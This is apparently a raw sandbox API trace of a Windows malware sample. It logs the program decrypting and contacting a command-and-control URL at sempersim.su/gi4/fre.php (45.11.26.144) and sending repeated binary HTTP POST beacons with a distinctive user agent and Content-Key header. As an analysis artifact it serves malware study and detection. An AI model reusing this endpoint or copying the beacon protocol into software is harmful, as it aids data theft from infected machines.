GetProcessHeap () returned 0x5b0000 [0221.381] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0221.381] recv (in: s=0x33c, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0222.912] GetProcessHeap () returned 0x5b0000 [0222.913] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0222.913] GetProcessHeap () returned 0x5b0000 [0222.914] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0222.914] GetProcessHeap () returned 0x5b0000 [0222.915] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0222.915] GetProcessHeap () returned 0x5b0000 [0222.915] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | out: hHeap=0x5b0000) returned 1 [0222.915] closesocket (s=0x33c) returned 0 [0222.916] GetProcessHeap () returned 0x5b0000 [0222.916] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8d0 | out: hHeap=0x5b0000) returned 1 [0222.916] GetProcessHeap () returned 0x5b0000 [0222.916] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d56e8 | out: hHeap=0x5b0000) returned 1 [0222.916] GetProcessHeap () returned 0x5b0000 [0222.917] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3158 | out: hHeap=0x5b0000) returned 1 [0222.917] GetProcessHeap () returned 0x5b0000 [0222.917] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0222.917] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x12a0) returned 0x33c [0222.919] Sleep (dwMilliseconds=0xea60) [0222.921] GetProcessHeap () returned 0x5b0000 [0222.921] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3158 [0222.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.922] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0222.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.930] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5e60) returned 1 [0222.940] GetProcessHeap () returned 0x5b0000 [0222.940] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8680 [0222.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.941] CryptImportKey (in: hProv=0x5c5e60, pbData=0x5c8680, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0222.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.942] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0222.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.943] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.943] GetProcessHeap () returned 0x5b0000 [0222.943] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8680 | out: hHeap=0x5b0000) returned 1 [0222.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.944] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3158, pdwDataLen=0xdfcfc | out: pbData=0x5d3158, pdwDataLen=0xdfcfc) returned 1 [0222.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.945] CryptDestroyKey (hKey=0x5bde08) returned 1 [0222.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.946] CryptReleaseContext (hProv=0x5c5e60, dwFlags=0x0) returned 1 [0222.946] GetProcessHeap () returned 0x5b0000 [0222.946] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0222.946] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0222.947] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0222.947] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0222.947] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0222.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0222.948] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0222.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0222.949] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0222.949] GetProcessHeap () returned 0x5b0000 [0222.949] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0222.949] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0222.949] GetProcessHeap () returned 0x5b0000 [0222.950] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0222.950] GetProcessHeap () returned 0x5b0000 [0222.950] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6a50 | out: hHeap=0x5b0000) returned 1 [0222.950] GetProcessHeap () returned 0x5b0000 [0222.950] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3158 | out: hHeap=0x5b0000) returned 1 [0222.950] GetProcessHeap () returned 0x5b0000 [0222.950] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d35d8 [0222.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.951] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0222.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.956] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5a20) returned 1 [0222.962] GetProcessHeap () returned 0x5b0000 [0222.962] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8620 [0222.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.963] CryptImportKey (in: hProv=0x5c5a20, pbData=0x5c8620, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0222.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.963] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0222.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.964] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.964] GetProcessHeap () returned 0x5b0000 [0222.965] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8620 | out: hHeap=0x5b0000) returned 1 [0222.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.966] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d35d8, pdwDataLen=0xdfcfc | out: pbData=0x5d35d8, pdwDataLen=0xdfcfc) returned 1 [0222.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.966] CryptDestroyKey (hKey=0x5bde08) returned 1 [0222.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0222.967] CryptReleaseContext (hProv=0x5c5a20, dwFlags=0x0) returned 1 [0222.967] GetProcessHeap () returned 0x5b0000 [0222.967] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5298 [0222.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0222.968] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0222.969] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0222.969] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0222.969] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0222.970] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0222.970] GetProcessHeap () returned 0x5b0000 [0222.970] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb100 [0222.970] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cdfe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0223.073] GetProcessHeap () returned 0x5b0000 [0223.074] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa10 [0223.074] socket (af=2, type=1, protocol=6) returned 0x340 [0223.074] connect (s=0x340, name=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0223.143] FreeAddrInfoW (pAddrInfo=0x5cdfe8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf248*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0223.143] GetProcessHeap () returned 0x5b0000 [0223.143] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5e60 [0223.143] GetProcessHeap () returned 0x5b0000 [0223.143] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0223.144] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0223.146] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0223.146] GetProcessHeap () returned 0x5b0000 [0223.146] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0223.146] GetProcessHeap () returned 0x5b0000 [0223.146] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0223.146] GetProcessHeap () returned 0x5b0000 [0223.146] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2e40 [0223.147] GetProcessHeap () returned 0x5b0000 [0223.147] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0223.148] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0223.149] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0223.149] GetProcessHeap () returned 0x5b0000 [0223.149] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0223.149] GetProcessHeap () returned 0x5b0000 [0223.149] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0223.149] send (s=0x340, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0223.150] send (s=0x340, buf=0x5d1e18*, len=159, flags=0) returned 159 [0223.150] GetProcessHeap () returned 0x5b0000 [0223.150] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0223.150] recv (in: s=0x340, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0224.449] GetProcessHeap () returned 0x5b0000 [0224.450] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0224.450] GetProcessHeap () returned 0x5b0000 [0224.450] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2e40 | out: hHeap=0x5b0000) returned 1 [0224.450] GetProcessHeap () returned 0x5b0000 [0224.450] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0224.450] GetProcessHeap () returned 0x5b0000 [0224.451] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5e60 | out: hHeap=0x5b0000) returned 1 [0224.451] closesocket (s=0x340) returned 0 [0224.451] GetProcessHeap () returned 0x5b0000 [0224.451] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa10 | out: hHeap=0x5b0000) returned 1 [0224.451] GetProcessHeap () returned 0x5b0000 [0224.452] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5298 | out: hHeap=0x5b0000) returned 1 [0224.452] GetProcessHeap () returned 0x5b0000 [0224.453] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d35d8 | out: hHeap=0x5b0000) returned 1 [0224.453] GetProcessHeap () returned 0x5b0000 [0224.453] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb100 | out: hHeap=0x5b0000) returned 1 [0224.453] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5d6e28, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x1294) returned 0x340 [0224.455] Sleep (dwMilliseconds=0xea60) [0224.472] GetProcessHeap () returned 0x5b0000 [0224.473] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d31e8 [0224.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.474] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0224.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.490] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5888) returned 1 [0224.499] GetProcessHeap () returned 0x5b0000 [0224.499] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8590 [0224.505] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.505] CryptImportKey (in: hProv=0x5c5888, pbData=0x5c8590, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0224.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.506] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0224.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.507] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.507] GetProcessHeap () returned 0x5b0000 [0224.507] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0224.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.509] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0224.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.510] CryptDestroyKey (hKey=0x5bde08) returned 1 [0224.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.511] CryptReleaseContext (hProv=0x5c5888, dwFlags=0x0) returned 1 [0224.511] GetProcessHeap () returned 0x5b0000 [0224.511] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0224.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0224.512] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0224.512] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0224.513] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0224.513] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0224.513] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0224.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0224.514] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0224.514] GetProcessHeap () returned 0x5b0000 [0224.514] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0224.514] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0224.515] GetProcessHeap () returned 0x5b0000 [0224.515] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0224.515] GetProcessHeap () returned 0x5b0000 [0224.515] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0224.515] GetProcessHeap () returned 0x5b0000 [0224.516] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0224.516] GetProcessHeap () returned 0x5b0000 [0224.516] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d34b8 [0224.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.522] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0224.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.527] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5c5dd8) returned 1 [0224.537] GetProcessHeap () returned 0x5b0000 [0224.537] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c86b0 [0224.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.538] CryptImportKey (in: hProv=0x5c5dd8, pbData=0x5c86b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0224.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.539] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0224.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.541] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.541] GetProcessHeap () returned 0x5b0000 [0224.541] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c86b0 | out: hHeap=0x5b0000) returned 1 [0224.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.542] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d34b8, pdwDataLen=0xdfcfc | out: pbData=0x5d34b8, pdwDataLen=0xdfcfc) returned 1 [0224.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.543] CryptDestroyKey (hKey=0x5be048) returned 1 [0224.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0224.543] CryptReleaseContext (hProv=0x5c5dd8, dwFlags=0x0) returned 1 [0224.543] GetProcessHeap () returned 0x5b0000 [0224.544] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d6a50 [0224.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0224.544] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0224.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0224.545] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0224.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0224.546] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0224.546] GetProcessHeap () returned 0x5b0000 [0224.546] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0224.547] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5ce060*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0224.860] GetProcessHeap () returned 0x5b0000 [0224.860] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca910 [0224.860] socket (af=2, type=1, protocol=6) returned 0x344 [0224.860] connect (s=0x344, name=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0224.929] FreeAddrInfoW (pAddrInfo=0x5ce060*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2a8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0224.929] GetProcessHeap () returned 0x5b0000 [0224.929] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5cc8 [0224.929] GetProcessHeap () returned 0x5b0000 [0224.929] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0224.930] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0224.930] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0224.930] GetProcessHeap () returned 0x5b0000 [0224.930] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6200 [0224.931] GetProcessHeap () returned 0x5b0000 [0224.931] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0224.931] GetProcessHeap () returned 0x5b0000 [0224.931] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3428 [0224.931] GetProcessHeap () returned 0x5b0000 [0224.931] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0224.932] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0224.932] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0224.932] GetProcessHeap () returned 0x5b0000 [0224.932] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cc0b0 [0224.932] GetProcessHeap () returned 0x5b0000 [0224.933] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0224.933] send (s=0x344, buf=0x5cc0b0*, len=236, flags=0) returned 236 [0224.934] send (s=0x344, buf=0x5d1e18*, len=159, flags=0) returned 159 [0224.934] GetProcessHeap () returned 0x5b0000 [0224.934] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5d6e28 [0224.934] recv (in: s=0x344, buf=0x5d6e28, len=4048, flags=0 | out: buf=0x5d6e28*) returned 237 [0226.466] GetProcessHeap () returned 0x5b0000 [0226.466] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc0b0 | out: hHeap=0x5b0000) returned 1 [0226.466] GetProcessHeap () returned 0x5b0000 [0226.467] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3428 | out: hHeap=0x5b0000) returned 1 [0226.467] GetProcessHeap () returned 0x5b0000 [0226.467] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6200 | out: hHeap=0x5b0000) returned 1 [0226.467] GetProcessHeap () returned 0x5b0000 [0226.467] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5cc8 | 